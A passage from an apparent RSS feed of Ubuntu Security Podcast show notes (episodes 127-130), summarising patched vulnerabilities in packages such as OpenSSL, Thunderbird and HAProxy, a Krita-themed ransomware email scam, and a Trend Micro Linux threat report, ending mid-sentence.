<li>As such, ended up <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=b339ec9c229aaf399296a120d7be0e34fbc355ca">changing</a> this to a <a href="https://lore.kernel.org/linux-security-module/YTfkO2PdnBXQXvsm@elver.google.com/">suggestion from Marco Elver</a> (also at
Google) to enable this when <code>COMPILE_TEST</code> is enabled - this used as a flag
to tell the kernel to compile everything even if it is not being used -
and is then often used by CI systems / developers which explicitly want
to compile everything who work on detecting new warnings</li>
<li>Is a lofty goal and is very useful from a security PoV and is
illustrative of many real world efforts that try and introduce static
analysis etc for an existing codebase</li>
<li>Immediately get a high number of &rsquo;errors&rsquo; now that need to be addressed -
was fine before? - so how to introduce these in a way that doesn&rsquo;t impose
a huge upfront cost but still incentivizes fixing them over time and
allows to detect new issues</li>
<li>Is good to see a focus on this in a more tangible way from upstream as
compiler warnings are there for a reason and should not be ignored</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E130.mp3" length="14373834" type="audio/mpeg" /><itunes:duration>18:33</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 129
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-129/</link>
          <pubDate>Fri, 03 Sep 2021 14:23:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>fc57cf07e7ce710ac5b60607ecb15972d4526e085181c8ca1d231b8e00c03f2cf9577a455593cf32a72c617828ae3cb4540882cf3a51e4ded0e3f636f658c5bd</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 129</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at a malware campaign associated with the popular Krita
  painting application, plus we cover security updates for MongoDB, libssh,
  Squashfs-Tools, Thunderbird and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at a malware campaign associated with the popular Krita
  painting application, plus we cover security updates for MongoDB, libssh,
  Squashfs-Tools, Thunderbird and more.
  </itunes:summary>
        <description>  This week we look at a malware campaign associated with the popular Krita
  painting application, plus we cover security updates for MongoDB, libssh,
  Squashfs-Tools, Thunderbird and more.
  </description>
        <googleplay:description>  This week we look at a malware campaign associated with the popular Krita
  painting application, plus we cover security updates for MongoDB, libssh,
  Squashfs-Tools, Thunderbird and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at a malware campaign associated with the popular Krita
painting application, plus we cover security updates for MongoDB, libssh,
Squashfs-Tools, Thunderbird and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>17 unique CVEs addressed</p>
<h3 id="usn-5037-2-firefox-regression-00-47">[<a href="https://ubuntu.com/security/notices/USN-5037-2">USN-5037-2</a>] Firefox regression [00:47]</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)</li>
<li>91.0.2 - upstream bug where as part of their advanced privacy protection,
would purge cookies associated with ad trackers etc - but this would then
clear authentication data as well and so would lose your master password
for Lockwise - and hence prompt the re-enter it seemingly randomly.</li>
</ul>
<h3 id="usn-5052-1-mongodb-vulnerability-01-31">[<a href="https://ubuntu.com/security/notices/USN-5052-1">USN-5052-1</a>] MongoDB vulnerability [01:31]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2386">CVE-2019-2386</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to invalidate existing sessions of users who are logged in and
their account is then deleted - so if the account is recreated before
they perform some action, the session gets reassociated with the new
account of the same name which may have higher privileges.</li>
</ul>
<h3 id="usn-5051-2-usn-5051-3-openssl-vulnerability-02-14">[<a href="https://ubuntu.com/security/notices/USN-5051-2">USN-5051-2</a>, <a href="https://ubuntu.com/security/notices/USN-5051-3">USN-5051-3</a>] OpenSSL vulnerability [02:14]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3712">CVE-2021-3712</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-128/">Episode 128</a> - ASN.1 string handling vuln</li>
</ul>
<h3 id="usn-5053-1-libssh-vulnerability-02-42">[<a href="https://ubuntu.com/security/notices/USN-5053-1">USN-5053-1</a>] libssh vulnerability [02:42]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3634">CVE-2021-3634</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Small SSH lib - used by libcurl, remmina and others</li>
<li>Heap buffer overflow when re-keying - so a malicious client / server
could cause crash / RCE on other side</li>
</ul>
<h3 id="usn-5055-1-gnome-grilo-vulnerability-03-22">[<a href="https://ubuntu.com/security/notices/USN-5055-1">USN-5055-1</a>] GNOME grilo vulnerability [03:22]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-39365">CVE-2021-39365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>GNOME media discovery framework</li>
<li>Failed to enable TLS certificate verification - so when connecting to a
remote media source, an attacker could replace the TLS cert with their
own self-signed one or similar and hence be able to intercept all
encrypted comms - simple change to specify to the underlying network
request library (libsoup) to check TLS certificate when making the
connection</li>
</ul>
<h3 id="usn-5056-1-apr-vulnerability-04-18">[<a href="https://ubuntu.com/security/notices/USN-5056-1">USN-5056-1</a>] APR vulnerability [04:18]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-35940">CVE-2021-35940</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>abstraction layer library across platform specific services / APIs</li>
<li>used by apache2, subversion and others</li>
<li>OOB read in time handling functions - would fail to validate parameters
were within expected range (ie only 12 months in a year but uses a signed
int to represent this)</li>
</ul>
<h3 id="usn-5054-1-uwsgi-vulnerability-05-38">[<a href="https://ubuntu.com/security/notices/USN-5054-1">USN-5054-1</a>] uWSGI vulnerability [05:38]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11984">CVE-2020-11984</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow in handling of large HTTP request headers - protocol
represents header name/values and overall length in a uint16_t = so can
only handle up to 16K headers so if more than that would cause an integer
overflow and hence a buffer overread where it would read other memory
instead of the actual request body</li>
</ul>
<h3 id="usn-5057-1-squashfs-tools-vulnerability-06-34">[<a href="https://ubuntu.com/security/notices/USN-5057-1">USN-5057-1</a>] Squashfs-Tools vulnerability [06:34]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40153">CVE-2021-40153</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to reject filenames in squashfs image containing relative path
components - using a crafted mksquashfs could create such an image and
then unsquashfs would happy create that file, outside of the extracted
directory - path traversal vuln</li>
</ul>
<h3 id="usn-5058-1-thunderbird-vulnerabilities-08-14">[<a href="https://ubuntu.com/security/notices/USN-5058-1">USN-5058-1</a>] Thunderbird vulnerabilities [08:14]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30547">CVE-2021-30547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29989">CVE-2021-29989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29988">CVE-2021-29988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29986">CVE-2021-29986</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29985">CVE-2021-29985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29984">CVE-2021-29984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29980">CVE-2021-29980</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29976">CVE-2021-29976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29970">CVE-2021-29970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29969">CVE-2021-29969</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>78.13</li>
<li>STARTTLS vuln - would accept IMAP responses received before had finished
STARTTLS handshake - PiTM inject content etc - plus various vulns from
Firefox re web rendering etc</li>
</ul>
<h3 id="usn-5060-1-usn-5060-2-ntfs-3g-vulnerabilities-09-51">[<a href="https://ubuntu.com/security/notices/USN-5060-1">USN-5060-1</a>, <a href="https://ubuntu.com/security/notices/USN-5060-2">USN-5060-2</a>] NTFS-3G vulnerabilities [09:51]</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)</li>
<li>A heap of vulns - 21 in total - integer overflows, buffer overflows etc -
code execution, DoS etc - unlike say EXT4 and other drivers, this is FUSE
so impact is limited to only user-level code execution, not root /
in-kernel</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="krita-ransomware-email-campaign-11-17">Krita Ransomware Email Campaign [11:17]</h3>
<ul>
<li>Emails sent to popular youtubers / facebook / instagrammers purportedly
from Krita asking to collaborate on a paid advertising and a link to
download some media pack - proposed videos to show on your youtube
channel etc</li>
<li>The link is to krita.app or perhaps krita.io - not the official
&ldquo;krita.org&rdquo; domain - looks the same as the real krita.org but is only
just the homepage, other pages have redirects to the real krita.org</li>
<li>Download contains an encrypted zip file (alarm bell**)</li>
<li>Video part has 3 seeming videos - 2 .mp4.scr files and one actual mp4 -
(second alarm bell**) .scr is really an exe - and a few vendors on VT
already detects these as malicious - but a lot don&rsquo;t</li>
<li>Interesting to see an open source app being used to target content
creators - seems both krita.app / krita.io now redirect to krita.org and
the mediabank.zip is now longer up either</li>
<li><a href="https://krita.org/en/item/warning-scam-mails-about-krita-and-youtube-coming-from-krita-io/">https://krita.org/en/item/warning-scam-mails-about-krita-and-youtube-coming-from-krita-io/</a></li>
</ul>
<h3 id="hiring-15-50">Hiring [15:50]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a></li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E129.mp3" length="12778566" type="audio/mpeg" /><itunes:duration>16:48</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 128
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-128/</link>
          <pubDate>Fri, 27 Aug 2021 12:23:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>fb48a2b4f858022e2badbd76057680ed0553067fa1be365bd94c2e113b849329c388ef20395e365d381a3bb8607d801e59826d7d2aa2be890bae2af2144931e2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 128</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we dive into Trend Micro's recent Linux Threat Report and the
  release of Ubuntu 20.04.3 LTS, plus we detail security updates for
  Inetutils telnetd, the Linux kernel and OpenSSL.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we dive into Trend Micro's recent Linux Threat Report and the
  release of Ubuntu 20.04.3 LTS, plus we detail security updates for
  Inetutils telnetd, the Linux kernel and OpenSSL.
  </itunes:summary>
        <description>  This week we dive into Trend Micro's recent Linux Threat Report and the
  release of Ubuntu 20.04.3 LTS, plus we detail security updates for
  Inetutils telnetd, the Linux kernel and OpenSSL.
  </description>
        <googleplay:description>  This week we dive into Trend Micro's recent Linux Threat Report and the
  release of Ubuntu 20.04.3 LTS, plus we detail security updates for
  Inetutils telnetd, the Linux kernel and OpenSSL.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we dive into Trend Micro&rsquo;s recent Linux Threat Report and the
release of Ubuntu 20.04.3 LTS, plus we detail security updates for
Inetutils telnetd, the Linux kernel and OpenSSL.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>9 unique CVEs addressed</p>
<h3 id="usn-5048-1-inetutils-vulnerability-00-45">[<a href="https://ubuntu.com/security/notices/USN-5048-1">USN-5048-1</a>] Inetutils vulnerability [00:45]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10188">CVE-2020-10188</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow in inetutils telnetd - originally CVE was found in netkit
telnetd - but subsequently the GNU inetutils version was also found to
contain basically the same vulnerable function. Very detailed blog post
re exploiting this on Fedora, great example if you are interested in vuln
hunting etc - patched but why run telnetd?</li>
<li><a href="https://appgateresearch.blogspot.com/2020/02/bravestarr-fedora-31-netkit-telnetd_28.html">https://appgateresearch.blogspot.com/2020/02/bravestarr-fedora-31-netkit-telnetd_28.html</a></li>
</ul>
<h3 id="usn-5050-1-linux-kernel-vulnerabilities-02-03">[<a href="https://ubuntu.com/security/notices/USN-5050-1">USN-5050-1</a>] Linux kernel vulnerabilities [02:03]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38208">CVE-2021-38208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3573">CVE-2021-3573</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28691">CVE-2021-28691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0129">CVE-2021-0129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 bluetooth HCI UAFs, NFC NULL ptr deref, Xen PV UAF from guest-&gt;host, 2
other bluetooth vulns - info leak - all covered in previous episodes</li>
</ul>
<h3 id="usn-5051-1-openssl-vulnerabilities-02-49">[<a href="https://ubuntu.com/security/notices/USN-5051-1">USN-5051-1</a>] OpenSSL vulnerabilities [02:49]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3712">CVE-2021-3712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3711">CVE-2021-3711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>High profile vuln in SM2 algorithm impl in openssl - (Chinese and later
ISO standard elliptic curve algo used for both signature and encryption)
<ul>
<li>Usual scheme is to call the API function <code>EVP_PKEY_decrypt()</code> twice - call
first time to get the required buffer size to hold the decrypted
plaintext - second time to do the actual decryption passing a buffer of
the specified length to hold the result</li>
<li>Bug meant the returned length in first call would be smaller than
required -&gt; up to 62 byte buffer overflow using attacker controlled data</li>
<li>Depending on application, could be heap or stack buffer</li>
<li>Possible RCE</li>
</ul>
</li>
<li>Buffer overread in handling of ASN.1 strings
<ul>
<li>ASN1 strings in openssl are represented as the bytes plus a length -
unlike normal C strings, bytes array of the string is NOT NUL
terminated in general</li>
<li>However some internal functions would actually add a NUL byte - and
other functions ended up assuming ASN1 strings would all be NUL
terminated - plus various functions to parse ASN1 data would also add
NUL terminators too - so if had an application that was manually
constructing ASN1 strings without adding a NUL terminator, this could
result in a buffer overread if these were passed to a function which
expected a NUL (ie functions which print the contents etc)</li>
<li>Again depends on application that uses OpenSSL - so not all will be
vulnerable - but fixed to ensure all internal functions which handle
ASN1 strings in OpenSSL respect the length field and not assume is NUL
terminated</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-20-dot-04-dot-3-lts-released-05-58">Ubuntu 20.04.3 LTS released [05:58]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2021-August/000271.html">https://lists.ubuntu.com/archives/ubuntu-announce/2021-August/000271.html</a></li>
<li>Desktop installer uses HWE stack by default - Server uses GA but can
select HWE during install process</li>
<li>Includes all security etc updates so less to download during / after
install</li>
<li>Flavours have also updated</li>
<li>If already running 20.04 then no need to do anything - you already have
this :)</li>
</ul>
<h3 id="trend-micro-linux-threat-report-2021-1h-07-20">Trend Micro Linux Threat Report 2021 1H [07:20]</h3>
<ul>
<li><a href="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations">https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations</a></li>
<li>Report which collates data from Trend Micro™ Smart Protection Network™
(SPN) (data lake) - collects data across all Trend Micro products plus
various honeypots and other sensors etc - measure of real-world malware
prevalence and vuln exploitation in enterprises</li>
<li>Linux makes up 61% of Cloud One users - cloud native product for
protection of cloud deployments</li>
<li>Ubuntu makes up 16% of that (RH 30%, AWS Linux 18%)</li>
<li>Top threats:
<ul>
<li>Coinminers, Web shells, Ransomware, Trojans, other</li>
<li>For systems which contained these:
<ul>
<li>51% CentOS, 31% CloudLinux, 10% Ubuntu, 3% RHEL</li>
</ul>
</li>
</ul>
</li>
<li>Intrusion Protection System (IPS) hits:
<ul>
<li>36% Amazon Linux, 23% RHEL 7, 8% CentOS 7, 7% RHEL 6, Amazon Linux, Ubuntu 18.04, 4% Ubuntu 20.04, 16.04</li>
</ul>
</li>
<li>Top 15 vulns with known exploits:
<ul>
<li>5 were in Apache Struts2 - incl. vuln used in Equifax breach in 2017</li>
<li>1 each in Drupal, Oracle WebLogic, WordPress file manager plugin,
vBulletin, Eclipse Jetty, Alibaba Nacos, Atlassian Jira, NginX, Liferay
<ul>
<li>Most of these are not shipped in Ubuntu but clearly orgs are
deploying these sorts of applications on Ubuntu/RHEL etc</li>
</ul>
</li>
</ul>
</li>
<li>Of 20k vulns from 2020, only ~200 were observed with known public exploits
<ul>
<li>roughly the same as above but more of the sorts of things we ship <strong>and
support</strong> in Ubuntu
<ul>
<li>struts, netty, drupal, <strong>dnsmasq</strong>, JIRA, WebLogic, Wordpress, <strong>nginx</strong>,
<strong>apache httpd</strong>, <strong>ISC BIND</strong>, <strong>openssl</strong>, <strong>tomcat</strong></li>
</ul>
</li>
</ul>
</li>
<li>76% are attacks against web apps</li>
<li>Looking at OWASP top 10 - of all attack by volume, only 21% fit into
OWASP top 10 - ie. SQL injection, command injection, XSS, insecure
deserialisation, XML EE,
<ul>
<li>Looking at attacks outside OWASP top 10
<ul>
<li>Brute force ~40% of all attacks</li>
<li>Directory traversal 21%</li>
<li>Request smuggling</li>
</ul>
</li>
</ul>
</li>
<li>Also briefly mentions how to secure Linux but only talks technologies -
iptables, seccomp, AppArmor, SELinux etc - and on practical guidance
mentions Antimalware (ie Trend 😉), IPS/IDS, application whitelisting,
<strong>vuln patching</strong>, activity monitoring etc</li>
<li>Plus looks a bit at containers - ranks vulns in 15 most popular official
docker images - Python comes in on top with 482 vulns, Node 470,
Wordpress 402, Golang 288, nginx 118, postgres 86, influxdb 85, apache
httpd 84, mysql 76&hellip;
<ul>
<li>Not surprising perhaps that the more general purpose images have more
vulns - more code, more vulns, also perhaps a larger attack surface etc
too</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E128.mp3" length="13439687" type="audio/mpeg" /><itunes:duration>17:56</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 127
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-127/</link>
          <pubDate>Fri, 20 Aug 2021 12:47:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>a455c6ad897495c52bbbe528b6ea7bc35fc2166a5624cd68dfeca95b2489d84a229a7ccdd644177960f967b9f590878167bc91b714c383156ee9fbc872cd3964</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 127</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for Firefox, PostgreSQL, MariaDB,
  HAProxy, the Linux kernel and more, plus we cover some current openings on
  the team - come join us ☺
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for Firefox, PostgreSQL, MariaDB,
  HAProxy, the Linux kernel and more, plus we cover some current openings on
  the team - come join us ☺
  </itunes:summary>
        <description>  This week we look at security updates for Firefox, PostgreSQL, MariaDB,
  HAProxy, the Linux kernel and more, plus we cover some current openings on
  the team - come join us ☺
  </description>
        <googleplay:description>  This week we look at security updates for Firefox, PostgreSQL, MariaDB,
  HAProxy, the Linux kernel and more, plus we cover some current openings on
  the team - come join us ☺
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for Firefox, PostgreSQL, MariaDB,
HAProxy, the Linux kernel and more, plus we cover some current openings on
the team - come join us ☺</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>35 unique CVEs addressed</p>
<h3 id="usn-5037-1-firefox-vulnerabilities-00-39">[<a href="https://ubuntu.com/security/notices/USN-5037-1">USN-5037-1</a>] Firefox vulnerabilities [00:39]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29990">CVE-2021-29990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29989">CVE-2021-29989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29988">CVE-2021-29988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29987">CVE-2021-29987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29986">CVE-2021-29986</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29985">CVE-2021-29985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29984">CVE-2021-29984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29982">CVE-2021-29982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29981">CVE-2021-29981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29980">CVE-2021-29980</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>91.0
<ul>
<li>Better support for clearing cookies to stop possible hidden data leaks as part of the Total Cookie Protection</li>
<li>Private browsing to use attempt HTTPS by default than fallback to HTTP</li>
<li>Various security fixes:
<ul>
<li>race condition on DNS resolution specific to Linux -&gt; memory
corruption -&gt; crash / RCE</li>
<li>also specific to Linux - subsequent permissions dialogs would accept
input in the location of the original one - so could possibly trick a
user into accepting a permission without their direct knowledge</li>
<li>various other memory corruption issues in JIT etc</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-3809-2-openssh-regression-02-54">[<a href="https://ubuntu.com/security/notices/USN-3809-2">USN-3809-2</a>] OpenSSH regression [02:54]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-10708">CVE-2016-10708</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15473">CVE-2018-15473</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-11/">Episode 11</a> - possible user enumeration since as a result of patching
<a href="https://ubuntu.com/security/CVE-2018-15473">CVE-2018-15473</a> the behaviour when trying to log in changed depending on
whether the specific user account existed or not - due to a mistake made
when backporting the upstream patch</li>
</ul>
<h3 id="usn-5038-1-postgresql-vulnerabilities-03-38">[<a href="https://ubuntu.com/security/notices/USN-5038-1">USN-5038-1</a>] PostgreSQL vulnerabilities [03:38]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3449">CVE-2021-3449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3677">CVE-2021-3677</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 possible remote crasher bugs - one through just sending a crafted TLS
ClientHello message -&gt; NULL ptr deref -&gt; crash, the other via the planner
which is used to try and optimise SQL queries - possible OOB read</li>
</ul>
<h3 id="usn-5022-2-mariadb-vulnerabilities-04-19">[<a href="https://ubuntu.com/security/notices/USN-5022-2">USN-5022-2</a>] MariaDB vulnerabilities [04:19]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-2389">CVE-2021-2389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2372">CVE-2021-2372</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-124/">Episode 124</a> in MySQL - only 2 of these also were relevant to MariaDB</li>
<li>Like MySQL, update to latest point release in each series - 10.5.12 for
hirsute, 10.3.31 for focal - includes both bug <strong>and</strong> security fixes</li>
</ul>
<h3 id="usn-5042-1-haproxy-vulnerabilities-05-07">[<a href="https://ubuntu.com/security/notices/USN-5042-1">USN-5042-1</a>] HAProxy vulnerabilities [05:07]</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Hirsute (21.04)</li>
<li>HTTP/2 handling issues in HAProxy</li>
<li><a href="https://portswigger.net/research/http2">Researchers</a> investigated HTTP/2 handling in various gateway / proxies and
